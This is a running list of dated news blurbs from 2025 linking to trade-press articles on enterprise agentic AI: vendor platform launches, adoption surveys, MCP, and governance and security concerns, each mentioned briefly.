<p><em>December 19, 2025</em>: <a href="https://www.csoonline.com/article/4109123/managing-agentic-ai-risk-lessons-from-the-owasp-top-10.html">LLM-powered chatbots have risks</a> that we see playing out in the headlines on a nearly daily basis. But chatbots are limited to answering questions. AI agents, however, access data and tools and carry out tasks, making them infinitely more capable – and more dangerous to enterprises.</p>



<h3 class="wp-block-heading">Agentic AI in 2026: More mixed than mainstream</h3>



<p><em>December 18, 2025:</em> Agentic AI is having its everything, everywhere, all at once moment. Or is it? Data clarifies. While 39% of organizations surveyed by McKinsey say they are experimenting with agents, <a href="https://www.cio.com/article/4107315/agentic-ai-in-2026-more-mixed-than-mainstream.html">only 23% have begun scaling AI agents</a> within one business function</p>



<h3 class="wp-block-heading">Overcome governance and trust issues to drive agentic AI</h3>



<p><em>December 18, 2025</em>: Fully autonomous agentic AI is still way off but <a href="https://www.cio.com/article/4105490/overcome-governance-and-trust-issues-to-drive-agentic-ai.html">AI agents are making inroads within enterprise software</a> and workflows. Gartner predicts 40% of enterprise software will feature task-specific AI agents by the end of 2026 as the current trend for embedded AI assistants evolves.</p>



<h3 class="wp-block-heading">Nvidia bets on open infrastructure for the agentic AI era with Nemotron 3</h3>



<p><em>Decenber 15, 2025</em>: <a href="https://www.infoworld.com/article/4106756/nvidia-bets-on-open-infrastructure-for-the-agentic-ai-era-with-nemotron-3.html">AI agents must be able to cooperate, coordinate, and execute</a> across large contexts and long time periods, and this, says Nvidia, demands a new type of infrastructure, one that is open. The company says it has the answer with its new Nemotron 3 family of open models.</p>



<h3 class="wp-block-heading">Microsoft drops M365 Copilot price for SMBs, upgrades free Copilot Chat</h3>



<p><em>November 19, 2025</em>: Microsoft announced that it <a href="https://www.computerworld.com/article/4093224/microsoft-drops-m365-copilot-price-for-smbs-upgrades-free-copilot-chat.html">reduce the price of Microsoft 365 Copilot for small and mid-sized firms</a> beginning next month. Microsoft 365 Copilot for Business will cost $21 per user, per month for customers with any Microsoft 365 Business plan. That’s down from the current $30 monthly price.</p>



<h3 class="wp-block-heading">Microsoft Fabric IQ adds ‘semantic intelligence’ layer to Fabric</h3>



<p><em>November 19, 2025</em>: Microsoft promises enterprises better understanding of their data for workers and <a href="https://www.infoworld.com/article/4093181/microsoft-fabric-iq-adds-semantic-intelligence-layer-to-fabric.html">autonomous agents</a> alike, but analysts fear deployment hurdles and vendor lock-in.</p>



<h3 class="wp-block-heading">Microsoft unveils Agent 365 to help IT manage AI ‘agent sprawl’</h3>



<p><em>November 18, 2025:</em> As businesses begin deploying AI agents in greater numbers, IT teams will need to manage and secure those AI systems as they connect to corporate data. That’s the idea behind Microsoft’s Agent 365 (A365), a new “control plane” that lets customers deploy and govern the use of agents. </p>



<h3 class="wp-block-heading">From chatbots to colleagues: How agentic AI is redefining enterprise automation</h3>



<p><em>November 17, 2025</em>: <a href="https://www.computerworld.com/article/4083589/from-chatbots-to-colleagues-how-agentic-ai-is-redefining-enterprise-automation.html">A new wave of agentic AI</a> is taking shape: systems that not only converse but also reason, plan, and act within enterprise workflows. These agents are not assistants that talk; they are digital colleagues that think.</p>



<h3 class="wp-block-heading">The enterprise IT overhaul: Architecting your stack for the agentic AI era</h3>



<p><em>November 10, 2025</em>: For the CIO, the conversation has officially moved past the large language model (LLM). <a href="https://www.cio.com/article/4086719/the-enterprise-it-overhaul-architecting-your-stack-for-the-agentic-ai-era.html">The next critical chapter is agentic AI </a>— autonomous systems capable of reasoning, planning and executing multi-step tasks across your enterprise. Agentic AI is here. Now, CIOs must orchestrate</p>



<p><em>October 23, 2025</em>: Agentic AI is about to change how companies create value.  Yet, most enterprises aren’t ready. The problem isn’t the technology — it’s the planning and execution. Too <a href="https://www.cio.com/article/4076519/agentic-ai-is-here-now-cios-must-orchestrate.html">many pilots stall out because CIOs haven’t built the AI systems</a>, guardrails and culture to move beyond experiments. </p>



<h3 class="wp-block-heading">AI agents might smooth some of retail’s worst data problems</h3>



<p><em>October 21, 2025</em>: So many retail challenges hinge on unreliable product data. <a href="https://www.computerworld.com/article/4074007/ai-agents-might-smooth-some-of-retails-worst-data-problems.html">Can agentic AI clean up that data enough</a> to make a difference? Can it do the same for other verticals?</p>



<h3 class="wp-block-heading">The impact of agentic AI on SaaS and partner ecosystems</h3>



<p><em>October 16, 2025</em>: The enterprise technology landscape is entering a <a href="https://www.cio.com/article/4072984/the-impact-of-agentic-ai-on-saas-and-partner-ecosystems.html">critical pivot point as agentic AI transforms partner ecosystems</a> from human-mediated, application integration networks into autonomous, self-orchestrating and intelligent ecosystems.</p>



<h3 class="wp-block-heading">Salesforce updates its agentic AI pitch with Agentforce 360</h3>



<p><em>October 13  2025</em>:  Salesforce announced a new release of Agentforce that, it says, “gives teams the <a href="https://www.cio.com/article/4071597/salesforce-updates-its-agentic-ai-pitch-with-agentforce-360.html">fastest path from AI prototypes to production-scale agents</a>” — although with many of the new release’s features still to come, or yet to enter pilot phases or beta testing, some parts of that path will be much slower than others.</p>



<h3 class="wp-block-heading">Gemini Enterprise is Google’s new ‘front door’ for agentic AI access at work</h3>



<p><em>October 9, 2025</em>: Google introduced an AI assistant to serve as a platform so users can access and <a href="https://www.computerworld.com/article/4070253/gemini-enterprise-is-googles-new-front-door-for-agentic-ai-access-at-work.html">coordinate AI agents that automate work tasks</a>. Gemini Enterprise, which replaces the Agentspace app launched last year, also features new enterprise search functions to help customers tap into data from across an organization’s business apps. </p>



<h3 class="wp-block-heading">Oracle’s agentic AI push in Fusion Cloud CX offers embedded automation for CX leaders</h3>



<p>October 7, 2025: <a href="https://www.cio.com/article/4068707/oracles-agentic-ai-push-in-fusion-cloud-cx-offers-embedded-automation-for-cx-leaders.html">Oracle is adding new pre-built agents</a> to its Advertising and Customer Experience Cloud (Fusion Cloud CX) to help enterprises increase operational efficiency by automating sales, service, and marketing processes.</p>



<h3 class="wp-block-heading">IBM touts agentic AI orchestration, cryptographic risk controls</h3>



<p><em>October 7, 2025</em>: IBM watsonx Orchestrate offers more than 500 tools and customizable, domain-specific agents from IBM and third-party contributors. Among the additions to watsonx Orchestrate are <a href="https://www.networkworld.com/article/4068958/ibm-touts-agentic-ai-orchestration-cryptographic-risk-controls.html">AgentOps capabilities </a>that offer real-time monitoring and policy-based controls for observability and governance.</p>



<h3 class="wp-block-heading">How self-learning AI agents will reshape operational workflows</h3>



<p><em>October 6, 2025</em>: Google’s recent whitepaper, “Welcome to the Era of Experience,” signals a shift in the way AI agents are trained. Google hypothesizes that allowing <a href="https://www.infoworld.com/article/4067840/how-self-learning-ai-agents-will-reshape-operational-workflows.html">AI agents to learn from the experience of agents </a>rather than solely from human-generated training data will enable autonomous AI to surpass its current capabilities.</p>



<h3 class="wp-block-heading">Are your agentic AI projects driving toward success?</h3>



<p><em>October 3, 2025:</em> Anushree Verma, Gartner senior director analyst, says most <a href="https://www.cio.com/article/4067338/ai-agentics-key-factors-for-steering-projects-toward-success.html">agentic AI projects today are early-stage experiments or proofs of concept</a>, fueled primarily by hype and often misapplied.</p>



<h3 class="wp-block-heading">Microsoft unveils framework for building agentic AI apps</h3>



<p><em>October 3. 2025</em>:<a href="https://www.infoworld.com/article/4067500/microsoft-unveils-framework-for-building-agentic-ai-apps.html"> Microsoft has introduced the Microsoft Agent Framework</a>, an open-source SDK and runtime for building, orchestrating, and deploying AI agents and multi-agent workflows, with full framework support for .NET and Python.</p>



<h3 class="wp-block-heading">Salesforce Trusted AI Foundation seeks to power the agentic enterprise</h3>



<p><em>October 2, 2025</em>: As <a href="https://www.cio.com/article/4066640/salesforce-trusted-ai-foundation-provides-scaffolding-for-the-agentic-enterprise.html">Salesforce pushes further into agentic AI</a>, its aim is to evolve Salesforce Platform from an application for building AI to a foundational operating system for enterprise AI ecosystems. </p>



<h3 class="wp-block-heading">ServiceNow’s AI Experience is an agentic AI UI for the Now Platform</h3>



<p><em>September 30, 2025</em>: ServiceNow today launched the AI Experience (AIx), <a href="https://www.cio.com/article/4065541/servicenows-ai-experience-is-an-agentic-ai-ui-for-the-now-platform.html">a contextually aware multimodal AI-driven use UI for its Now platform</a>. Building on the <a href="https://www.cio.com/article/4054799/servicenow-zurich-release-introduces-agentic-ai-to-the-platform.html">ServiceNow AI Platform</a> and with a foundation in Now Assist, the company describes it as “a unified, conversational front door to enterprise AI.”</p>



<h3 class="wp-block-heading">How MCP is making AI agents actually do things in the real world</h3>



<p><em>September 29, 2025</em>: You’ve seen them: Those incredible large language models (LLMs) that can chat, write and even generate code. They’ve revolutionized how we interact with technology, but there’s a new, even more exciting chapter unfolding.  Discover how <a href="https://www.infoworld.com/article/4064169/how-mcp-is-making-ai-agents-actually-do-things-in-the-real-world.html">MCP is turning chatbots into doers</a>, and the future of work may never look the same.</p>



<h3 class="wp-block-heading">Agentic AI in IT security: Where expectations meet reality</h3>



<p><em>September 29, 2025</em>: <a href="https://www.csoonline.com/article/4064158/agentic-ai-in-it-security-where-expectations-meet-reality.html">Agentic AI has shifted from lab demos to real-world SOC</a> deployments. Unlike traditional automation scripts, software agents are designed to act on signals and execute security workflows intelligently, correlating logs, enriching alerts, and even take first-line containment actions.</p>



<h3 class="wp-block-heading">Walmart looks to cash in on agentic AI</h3>



<p><em>September 19, 2025</em>: <a href="https://www.cio.com/article/4059020/walmart-looks-to-cash-in-on-agentic-ai.html">Walmart doesn’t intend to lose its retail crown anytime soon</a>. And, according to US EVP and CTO Hari Vasudev, the $815B company’s artificial intelligence strategy will play a key role in preventing that from happening.</p>



<h3 class="wp-block-heading">5 steps for deploying agentic AI red teaming</h3>



<p><em>September 17, 2025</em>: As more enterprises deploy agentic AI applications, the potential attack surface increases in complexity and reach. But there is still hope that <a href="https://www.csoonline.com/article/4055224/5-steps-for-deploying-agentic-ai-red-teaming.html">AI agents can be harnessed for defensive purposes</a> too, including using traditional red teaming and penetration testing techniques but updated for the AI world.</p>



<h3 class="wp-block-heading">Google unveils payments protocol for AI agents with major financial firms</h3>



<p><em>September 17. 2025</em>: Google has introduced the Agent Payments Protocol (AP2), an open framework developed with more than 60 payments and technology companies to support <a href="https://www.computerworld.com/article/4058571/google-unveils-payments-protocol-for-ai-agents-with-major-financial-firms.html">secure, agent-led transactions</a> across platforms and payment methods.</p>



<h3 class="wp-block-heading">CrowdStrike bets big on agentic AI with new offerings after $290M Onum buy</h3>



<p><em>September 16, 2025</em>: At its Fal.Con conference, the cybersecurity giant <a href="https://www.csoonline.com/article/4057472/crowdstrike-bets-big-on-agentic-ai-with-new-offerings-after-290m-onum-buy.html">launched its Agentic Security Platform and Agentic Security Workforce</a>, aiming to outpace AI-driven adversaries with real-time intelligence, automation, and a common language for defense.</p>



<h3 class="wp-block-heading">Adobe makes Agent Orchestrator and AI agents generally available</h3>



<p><em>September 10, 2025</em>:  Adobe Experience Platform (AEP) Agent Orchestrator and six new AI agents are designed to build, deliver, and optimize customer experience and marketing campaigns. The company also announced Experience Platform Agent Composer for customizing and configuring <a href="https://www.cio.com/article/4054211/adobe-makes-agent-orchestrator-and-ai-agents-generally-available.html">AI agents based on brand guidelines and organizational policy</a>.</p>



<h3 class="wp-block-heading">Rethinking the IT organization for the agentic AI era</h3>



<p><em>September 2, 2025:</em> With the <a href="https://www.cio.com/article/4046473/rethinking-the-it-organization-for-the-agentic-ai-era.html">advent of agentic AI</a>, CIOs must be poised to adjust strategic IT priorities, mitigate new security risks, and reskill staff for a new era.</p>



<h3 class="wp-block-heading">How to build a production-grade agentic AI platform</h3>



<p><em>September 2, 2025</em>: Modular orchestration, fail-safe design, hybrid memory management, and LLM integration with domain knowledge are essential to <a href="https://www.infoworld.com/article/4037795/how-to-build-a-production-grade-agentic-ai-platform-lessons-from-gravity.html">agentic AI systems</a> that reason, act, and adapt at scale.</p>



<h3 class="wp-block-heading">Agentic AI: A CISO’s security nightmare in the making?</h3>



<p><em>September 2, 2025</em>: Enterprises will no doubt be using agentic AI for a growing number of workflows and processes, including software development, customer support automation, and more. But what are the c<a href="http://enterprises%20will%20no%20doubt%20be%20using%20agentic%20ai%20for%20a%20growing%20number%20of%20workflows%20and%20processes,%20including%20software%20development,%20customer%20support%20automation,%20robotic%20process%20automation%20(rpa),%20and%20employee%20support.%20among%20the%20key%20questions%20for%20cisos%20and%20their%20staffs/">ybersecurity risks of agentic AI</a>, and how much more work will it take for them to support their organizations’ agentic AI dreams?</p>



<h3 class="wp-block-heading">Microsoft researchers develop new tech for video AI agents</h3>



<p><em>September 2, 2025</em>: Microsoft researchers are developing technologies for a <a href="https://www.computerworld.com/article/4049703/microsoft-researchers-develop-new-tech-for-video-ai-agents.html">new class of video AI agents</a> to explore three-dimensional spaces before making decisions.The technology framework, called MindJourney, uses a range of AI technologies to understand and analyze 3D spaces, reason about the surroundings, and predict movement</p>



<h3 class="wp-block-heading">Salesforce AI Research unveils new tools for AI agents</h3>



<p><em>August 27, 2025</em>: Salesforce announced a simulated enterprise environment, benchmark, and account data unification tool that are designed to help customers transform into <a href="https://www.cio.com/article/4046713/salesforce-ai-research-unveils-new-tools-for-ai-agents.html">agentic AI enterprises</a>.</p>



<h3 class="wp-block-heading">Agentic AI promises a cybersecurity revolution — with asterisks</h3>



<p><em>August 18, 2025:</em> The hottest topic at this year’s Black Hat conference was the meteoric <a href="https://www.csoonline.com/article/4040145/agentic-ai-promises-a-cybersecurity-revolution-with-asterisks.html">emergence of AI tools for both cyber adversaries and defenders</a>, particularly the use of agentic AI to strengthen cybersecurity programs.</p>



<h3 class="wp-block-heading">4 thoughts on who should manage AI agents</h3>



<p>August 11, 2025: As AI agents proliferate, we need to turn our attention beyond AI agent builder platforms to AI orchestration and AI GRC platforms. It also raises questions about which <a href="https://www.cio.com/article/4036809/4-thoughts-on-who-should-manage-ai-agents.html">groups within the enterprise should manage AI agents </a>and how they should be treated.</p>



<h3 class="wp-block-heading">How bright are AI agents? Not very, recent reports suggest</h3>



<p><em>July 31, 2025</em>: Security researchers are adding more weight to a truth that infosec pros had already grasped: <a href="https://www.csoonline.com/article/4032291/how-bright-are-ai-agents-not-very-recent-reports-suggest.html">AI agents are not very bright</a>, and are easily tricked into doing stupid or dangerous things</p>



<h3 class="wp-block-heading">Will AI agents eat the SaaS market? Experts are split</h3>



<p><em>July 31,2025</em>: As hype about AI agents reaches new heights, an emerging theory suggests that the groundbreaking <a href="https://www.cio.com/article/4028997/will-ai-agents-eat-the-saas-market-experts-are-split.html">AI tools will kill the SaaS business model. </a>The claim isn’t particularly new, but is resurfacing, with people like Microsoft CEO Satya Nadella voicing this position. </p>



<h3 class="wp-block-heading">How agentic AI will change database management</h3>



<p>July 28, 2025: Generative AI has already had a profound impact on the world of database management. And now,  thanks to AI’s knack for pattern-recognition, teams can <a href="https://www.infoworld.com/article/4028146/how-agentic-ai-will-change-database-management.html">use generative AI to analyze data sets, </a>detect anomalies, and access invaluable insights with record speed and precision. </p>



<h3 class="wp-block-heading">As AI agents go mainstream, companies lean into confidential computing for data security</h3>



<p><em>July 21, 2025</em>: Companies need to stop ignoring data security as AI agents take over internal data movement in IT environments, analysts and IT execs warn.  To address that issue, some tech players are embracing the concept of “confidential computing.” While it’s existed for years, it;s now finding new life with the rise of genAI.</p>



<h3 class="wp-block-heading">How agentic AI will transform mobile apps and field operations</h3>



<p><em>July 15, 2015</em>: <a href="https://www.infoworld.com/article/4019656/how-agentic-ai-will-transform-mobile-apps-and-field-operations.html" data-type="link" data-id="https://www.infoworld.com/article/4019656/how-agentic-ai-will-transform-mobile-apps-and-field-operations.html">Agentic AI will usher in new mobile AI experiences</a>. Construction, manufacturing, healthcare, and other industries with significant field operations will benefit from mobile AI agents and the resulting operational agility. </p>



<h3 class="wp-block-heading">MCP is fueling agentic AI — and introducing new security risks</h3>



<p><em>July 10, 2025</em>: Model Context Protocol (MCP)  has caught fire, with several thousand MCP servers now available from a wide range of vendors enabling AI assistants to connect to their data and services. And with agentic AI increasingly seen as the future of IT, MCP will only grow in use in the enterprise. But innovations like <a href="https://www.csoonline.com/article/4015222/mcp-uses-and-risks.html">MCP also come with significant security risks</a>.</p>



<h3 class="wp-block-heading">3 industries where agentic AI is poised to make its mark</h3>



<p>July 4, 2024:  IT leaders from finance, retail, and healthcare lend insights into <a href="https://www.cio.com/article/4016392/how-agentive-ai-is-making-an-impact-an-industry-by-industry-overview.html">what organizations are doing with AI agents</a> today — and where they see the technology taking their organizations and industries in the future.</p>



<h3 class="wp-block-heading">IFS rolls TheLoops agentic AI into industrial ERP</h3>



<p><em>June 27, 2025:</em> <a href="https://www.cio.com/article/4014112/ifs-rolls-theloops-agentic-ai-into-industrial-erp.html">IFS is adding AI agent development and management capabilities</a> to its ERP platform with the acquisition of software startup The acquisition brings TheLoops’ full Agent Development life cycle (ADLC) platform into IFS, enabling enterprises to design, test, deploy, monitor, and fine-tune AI agents with built-in support for versioning, compliance, and performance optimization.</p>



<h3 class="wp-block-heading">How AI agents and agentic AI differ from each other</h3>



<p><em>June 12, 2025</em>: With agentic AI in its infancy and organizations rushing to adopt AI agents, there seems to be confusion about <a href="https://www.cio.com/article/4003880/how-ai-agents-and-agentic-ai-differ-from-each-other.html">the difference between “agentic AI” and “AI agents” technologies</a>, but experts say there’s growing understanding that the two are separate, but related, tools. </p>



<h3 class="wp-block-heading">The future of RPA ties to AI agents</h3>



<p>June 10, 2025: RPA is accelerating toward a crossroads, with IT leaders and experts debating its future. Some IT leaders say that more powerful and autonomous AI agents will replace the two-decade-old AI precursor technology, while others predict that <a href="https://www.cio.com/article/4001371/the-future-of-rpa-ties-to-ai-agents.html">AI agents and RPA </a>will work hand-in-hand.</p>



<h3 class="wp-block-heading">MCP is enabling agentic AI, but how secure is it?</h3>



<p><em>June 2, 2025</em>: Model context protocol<a href="https://www.cio.com/article/3997968/mcp-is-enabling-agentic-ai-but-how-secure-is-it.html"> (MCP) is becoming the plug-and-play standard for agentic AI</a> apps to pull in data in real time from multiple sources. However, this also makes it more attractive for malicious actors looking to exploit weaknesses in how MCP has been deployed. </p>



<h3 class="wp-block-heading">The agentic AI assist Stanford University cancer care staff needed</h3>



<p><em>May 30, 2025</em>: At Microsoft Build 2025 earlier this month, Nigam Shah, CDO for Stanford Health Care, discussed <a href="https://www.cio.com/article/3997951/stanford-university-alleviates-oncology-healthcare-worker-overload-with-agentive-ai.html">agentic AI’s ability to redefine healthcare</a>, especially in oncology, as physicians get overloaded with the administrative tasks of medicine, he said, which lead to burnout.</p>



<h3 class="wp-block-heading">Agentic AI, LLMs and standards big focus of Red Hat Summit</h3>



<p><em>May 26, 2025</em>: Red Hat, announced a number of improvements in its core enterprise Linux product, including better security, better support for containers, better support for edge devices. But the <a href="https://www.networkworld.com/article/3993622/agentic-ai-llms-and-standards-big-focus-of-red-hat-summit.html">one topic that dominated the conversation was AI</a>.</p>



<h3 class="wp-block-heading">Putting agentic AI to work in Firebase Studio</h3>



<p><em>May 21, 2025</em>: Putting agentic AI to work in software engineering can be done in a variety of ways. Some agents work independently of the developer’s environment, working essentially like a remote developer. Other <a href="https://www.infoworld.com/article/3981588/putting-agentic-ai-to-work-in-firebase-studio.html?utm_date=20250521140633&amp;utm_campaign=Infoworld%20US%20First%20Look&amp;utm_content=slotno-1-readmore-Building%20a%20database-backed%20web%20application%20with%20Gemini%20in%20Firebase%20is%20far%20from%20perfect%2C%20but%20it%E2%80%99s%20better%20than%20coding%20without%20AI.%20&amp;utm_term=Infoworld%20US%20Editorial%20Newsletters&amp;utm_medium=email&amp;utm_source=Adestra&amp;aid=2255020&amp;huid=0b2f6c0f-9f15-45f8-bd06-4e1810ba35be">agents directly within a developer’s own environment</a>. Google’s Firebase Studio is an example of the latter, drawing on Google’s Gemini LLM o help developers prototype and build applications .</p>



<h3 class="wp-block-heading">Why is Microsoft offering to turn websites into AI apps with NLWeb?</h3>



<p><em>May 20. 2025</em>: NLWeb, short for Natural Language Web, is designed to help enterprises build a natural language interface for their websites using the model of their choice and data to answer user queries about the contents of the website.<a href="http://microsoft%E2%80%99s%20strategy%20to%20stake%20its%20claim%20on%20the%20agentic%20web%20before%20rivals%20such%20as%20google%20and%20amazon%20do/"> Microsoft hopes to stake its claim on the agentic web </a>before rivals Google and Amazon do.</p>



<h3 class="wp-block-heading">Databricks to acquire open-source database startup Neon to build the next wave of AI agents</h3>



<p><em>May 14, 2025</em>: Agentic AI requires a new type of architecture because traditional workflows create gridlock, dragging down speed and performance. To get ahead in this next generation of app building, <a href="https://www.infoworld.com/article/3985947/databricks-to-acquire-open-source-database-startup-neon-to-build-the-next-wave-of-ai-agents.html">Databricks announced it will purchase Neon</a>, an open-source serverless Postgres company. </p>



<h3 class="wp-block-heading">Agentic mesh: The future of enterprise agent ecosystems</h3>



<p><em>May 13, 2025</em>: Nvidia CEO Jensen Huang predicts we’ll soon see “a couple of hundred million digital agents” inside the enterprise. Microsoft CEO Satya Nadella takes it even further: “<a href="https://www.infoworld.com/article/3978819/agentic-mesh-the-future-of-enterprise-agent-ecosystems.html">Agents will replace all software</a>.”</p>



<h3 class="wp-block-heading">Google to unveil AI agent for developers at I/O, expand Gemini integration</h3>



<p><em>May 13, 2025</em>: <a href="https://www.computerworld.com/article/3984016/google-to-unveil-ai-agent-for-developers-at-i-o-expand-gemini-integration.html">Google is expected to unveil a new AI agent </a>aimed at helping software developers manage tasks across the coding lifecycle, including task execution and documentation. The tool has reportedly been demonstrated to employees and select external developers ahead of the company’s annual I/O conference.</p>



<h3 class="wp-block-heading">Nvidia, ServiceNow engineer open-source model to create AI agents</h3>



<p><em>May 6, 2025</em>: <a href="https://www.computerworld.com/article/3978481/nvidia-servicenow-engineer-open-source-model-to-create-ai-agents.html">Nvidia and ServiceNow have created an AI model</a> that can help companies create learning AI agents to automate corporate workloads. The open-source Apriel model, available generally in the second quarter on HuggingFace, will help create AI agents that can make decisions around IT, human resources and customer-service functions.</p>



<h3 class="wp-block-heading">How IT leaders use agentic AI for business workflows</h3>



<p><em>April 30, 2025</em>: Jay Upchurch, CIO at SAS, backs <a href="https://www.cio.com/article/3966870/how-it-leaders-use-agentic-ai-for-business-workflows.html">agentic AI to enhance sales, marketing, IT, and HR motions</a>. “Agentic AI can make sales more effective by handling lead scoring, assisting with customer segmentation, and optimizing targeted outreach,” he says.</p>



<h3 class="wp-block-heading">Microsoft sees AI agents shaking up org charts, eliminating traditional functions</h3>



<p><em>April 28, 2025</em>: As companies increasingly automate work processes using agents, traditional functions such as finance, marketing, and engineering may fall away, giving <a href="https://www.cio.com/article/3972714/ms-ai-agents-become-teammates-a-new-enterprise-form-emerges.html">rise to an ‘agent boss’ era of delegation</a> and orchestration of myriad bots.</p>



<h3 class="wp-block-heading">Cisco automates AI-driven security across enterprise networks</h3>



<p><em>April 28, 2025</em>: Cisco announced a range of AI-driven security enhancements, including improved threat detection and response capabilities in Cisco XDR and Splunk Security, <a href="https://www.networkworld.com/article/3972640/cisco-automates-ai-driven-security-across-enterprise-networks.html">new AI agents</a>, and integration between Cisco’s AI Defense platform and ServiceNow SecOps.</p>



<h3 class="wp-block-heading">Hype versus execution in agentic AI</h3>



<p>April 25, 2025: <a href="https://www.infoworld.com/article/3970002/hype-versus-execution-in-agentic-ai.html">Agentic AI promises autonomous systems</a> capable of reasoning, making decisions, and dynamically adapting to changing conditions. The allure lies in machines operating independently, free of human intervention, streamlining processes and enhancing efficiency at unprecedented scales. But  David Linthicum writes, don’t be swept up by ambitious promises. </p>



<h3 class="wp-block-heading">Agents are here — but can you see what they’re doing?</h3>



<p>April 23, 2025: As the <a href="https://www.cio.com/article/3959486/agents-are-here-but-can-you-see-what-theyre-doing.html">agentic AI models powering individual agents get smarter</a>, the use cases for agentic AI systems get more ambitious — and the risks posed by these systems increase exponentially.A multicloud experiment in agentic AI: Lessons learned</p>



<h3 class="wp-block-heading">Agentic AI might soon get into cryptocurrency trading — what could possibly go wron</h3>



<p><em>April 15, 2025</em>: <a href="https://www.computerworld.com/article/3959170/agentic-ai-might-soon-get-into-cryptocurrency-trading-what-could-possibly-go-wrong.html">Agentic AI promises to simplify complex tasks</a> such as crypto trading or managing digital assets by automating decisions, enhancing accessibility, and masking technical complexity.</p>



<h3 class="wp-block-heading">Agentic AI is both boon and bane for security pros</h3>



<p><em>April 15, 2025</em>:  <a href="https://www.csoonline.com/article/3957719/agentic-ai-is-both-boon-and-bane-for-security-pros.html">Cybersecurity is at a crossroads with agentic AI</a>. It’s a powerful tool that can create reams of code in a blink of an eye, find and defuse threats, and be used so decisively and defensively. This has proved to be a huge force multiplier and productivity boon. But while powerful, agentic AI isn’t dependable, and that is the conundrum. </p>



<h3 class="wp-block-heading">AI agents vs. agentic AI: What do enterprises want?</h3>



<p><em>April 15, 2025</em>:  Now that this AI agent story has morphed into “agentic AI,” it seems to have taken on the same big-cloud-AI flavor that enteriprise already rejected. What do they want from AI agents, <a href="https://www.networkworld.com/article/3957285/ai-agents-vs-agentic-ai-what-do-enterprises-want.html">why is “agentic” thinking wrong</a>, and where is this all headed?</p>



<h3 class="wp-block-heading">A multicloud experiment in agentic AI: Lessons learned</h3>



<p><em>April 11, 2025</em>: Turns out you really can <a href="https://www.infoworld.com/article/3959533/i-built-an-agentic-ai-system-across-multiple-public-cloud-providers.html">build a decentralized AI system </a>that operates successfully across multiple public cloud providers. It’s both challenging and costly.</p>



<h3 class="wp-block-heading">Google adds open source framework for building agents to Vertex AI</h3>



<p>April 9, 2025: Google is adding a new open source framework for <a href="https://www.infoworld.com/article/3957875/google-adds-open-source-framework-for-building-agents-to-vertex-ai.html">building agents</a> to its AI and machine learning platform Vertex AI, along with other updates to help deploy and maintain these agents. The open source Agent Development Kit (ADK) will make it possible to build an AI agent in under 100 lines of Python code. It expects to add support for more languages later this year.</p>



<h3 class="wp-block-heading">Google’s Agent2Agent open protocol aims to connect disparate agents</h3>



<p><em>April 9, 2025</em>: Google has taken the covers off a new open protocol — Agent2Agent (A2A) — that aims to <a href="https://www.infoworld.com/article/3958032/googles-agent2agent-open-protocol-aims-to-connect-disparate-agents.html">connect agents across disparate ecosystems</a>.. At its annual Cloud Next conference, Google said that the A2A protocol will enable enterprises to adopt agents more readily as it bypasses the challenge of agents that are built on different vendor ecosystems not being able to communicate with each other.</p>



<h3 class="wp-block-heading">Riverbed bolsters AIOps platform with predictive and agentic AI</h3>



<p>April 8, 2025: Riverbed  unveiled updates to its <a href="https://www.networkworld.com/article/3957181/riverbed-bolsters-aiops-platform-with-predictive-and-agentic-ai.html">AIOps and observability platform</a> that the company says will transform how IT organizations manage complex distributed infrastructure and data more efficiently.  Expanded AI capabilities are aimed at making it easier to manage AIOps and enabling IT organizations to transition from reactive to predictive IT operations. </p>



<h3 class="wp-block-heading">Microsoft’s newest AI agents can detail how they reason</h3>



<p><em>March 26, 2025</em>: If you’re wondering <a href="https://www.computerworld.com/article/3854386/microsofts-newest-ai-agents-can-detail-how-they-reason.html">how AI agents work</a>, Microsoft’s new Copilot AI agents provide real-time answers on how data is being analyzed and sourced to reach results. The Researcher and Analyst agents take a deeper look at data sources such as email, chat or databases within an organization to produce research reports, analyze strategies, or convert raw information into meaningful data.</p>



<h3 class="wp-block-heading">Microsoft launches AI agents to automate cybersecurity amid rising threats</h3>



<p><em>March 26, 2025</em>: Microsoft has introduced a new set of <a href="https://www.csoonline.com/article/3853599/microsoft-launches-ai-agents-to-automate-cybersecurity-amid-rising-threats.html">AI agents for its Security Copilot</a> platform, designed to automate key cybersecurity functions as organizations face increasingly complex and fast-moving digital threats. The new tools focus on tasks such as phishing detection, data protection, and identity management.</p>



<h3 class="wp-block-heading">How AI agents work</h3>



<p><em>March 24, 2025</em>: By leveraging technologies such as machine learning, natural language processing (NLP), and contextual understanding, <a href="https://www.computerworld.com/article/3846150/how-ai-agents-work.html">AI agents can operate independently</a>, even partnering with other agents to perform complex tasks.</p>



<h3 class="wp-block-heading">5 top business use cases for AI agents</h3>



<p><em>March 19, 2025</em>: <a href="https://www.cio.com/article/3843379/5-top-business-use-cases-for-ai-agents.html">AI agents are poised to transform the enterprise</a>, from automating mundane tasks to driving customer service and innovation. But having strong guardrails in place will be key to success.<br></p>



<h3 class="wp-block-heading">Nvidia launches AgentIQ toolkit to connect disparate AI agents</h3>



<p><em>March 21, 2025</em>: As enterprises look to <a href="https://www.infoworld.com/article/3851326/nvidia-launches-agentiq-toolkit-to-connect-disparate-ai-agents.html">adopt agents and agentic AI </a>to boost the efficiency of their applications, Nvidia this week introduced a new open-source software library — AgentIQ toolkit — to help developers connect disparate agents and agent frameworks..</p>



<h3 class="wp-block-heading">Deloitte unveils agentic AI platform</h3>



<p><em>March 18, 2025</em>: At Nvidia GTC 2025 in San Jose, <a href="https://www.cio.com/article/3848252/deloitte-unveils-agentic-ai-platform.html">Deloitte announced Zora AI</a>, a new agentic AI platform that offers a portfolio of AI agents for finance, human capital, supply chain, procurement, sales and marketing, and customer service.The platform draws on Deloitte’s experience from its technology, risk, tax, and audit businesses, and is integrated with all major enterprise software platforms. </p>



<h3 class="wp-block-heading">The dawn of agentic AI: Are we ready for autonomous technology?</h3>



<p><em>March 15, 202</em>5: Much of the AI work prior has focused on large language models (LLMs) with a goal to give prompts to get knowledge out of the unstructured data. So it’s a question-and-answer process. Agentic AI goes beyond that. You can give it a task that might involve a complex set of steps that can change each time.</p>



<h3 class="wp-block-heading">How to know a business process is ripe for agentic AI</h3>



<p><em>March 11, 2025</em>: Deloitte predicts that in 2025, 25% of companies that use generative AI will launch <a href="https://www.cio.com/article/3829620/how-to-know-a-business-process-is-ripe-for-agentic-ai.html" target="_blank">agentic AI pilots or proofs of concept</a>, growing to 50% in 2027. The firm says some agentic AI applications, in some industries and for some use cases, could see actual adoption into existing workflows this year.</p>



<h3 class="wp-block-heading">With new division, AWS bets big on agentic AI automation</h3>



